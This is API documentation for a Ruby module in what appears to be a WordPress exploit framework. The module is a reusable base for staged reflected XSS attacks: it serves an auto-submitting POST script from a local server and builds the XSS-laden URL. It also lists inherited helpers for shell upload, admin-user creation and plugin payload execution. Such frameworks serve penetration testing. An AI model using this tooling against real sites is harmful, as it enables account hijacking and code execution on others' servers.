Module: Wpxf::WordPress::StagedReflectedXss

Includes:
ReflectedXss
Defined in:
lib/wpxf/wordpress/staged_reflected_xss.rb

Overview

Provides reusable functionality for reflected XSS modules.

Instance Method Summary collapse

Methods included from Xss

#upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Instance Method Details

#create_basic_post_script(url, fields) ⇒ Object

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.

Parameters:

  • url (String)

    the vulnerable URL.

  • fields (Hash)

    the fields and values to inject into the script.



52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 52

def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end

#initial_req_pathString

Returns the path to use for the initial request.

Returns:

  • (String)

    the path to use for the initial request.



21
22
23
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 21

def initial_req_path
  normalized_option_value('initial_req_path')
end

#initial_scriptString

Returns the initial script that should be served to automate a form submission to the vulnerable page.

Returns:

  • (String)

    the initial script that should be served to automate a form submission to the vulnerable page.



45
46
47
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 45

def initial_script
  nil
end

#initializeObject

Initialize a new instance of Wpxf::WordPress::StagedReflectedXss.



8
9
10
11
12
13
14
15
16
17
18
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 8

def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

#on_http_request(path, params, headers) ⇒ String

Invoked when a HTTP request is made to the server.

Parameters:

  • path (String)

    the path requested.

  • params (Hash)

    the query string parameters.

  • headers (Hash)

    the HTTP headers.

Returns:

  • (String)

    the response body to send to the client.



30
31
32
33
34
35
36
37
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 30

def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end

#runBoolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



75
76
77
78
79
80
81
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 75

def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end

#url_with_xssString

Returns the URL to send the user to which contains the XSS vector.

Returns:

  • (String)

    the URL to send the user to which contains the XSS vector.



40
41
42
 
# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 40

def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end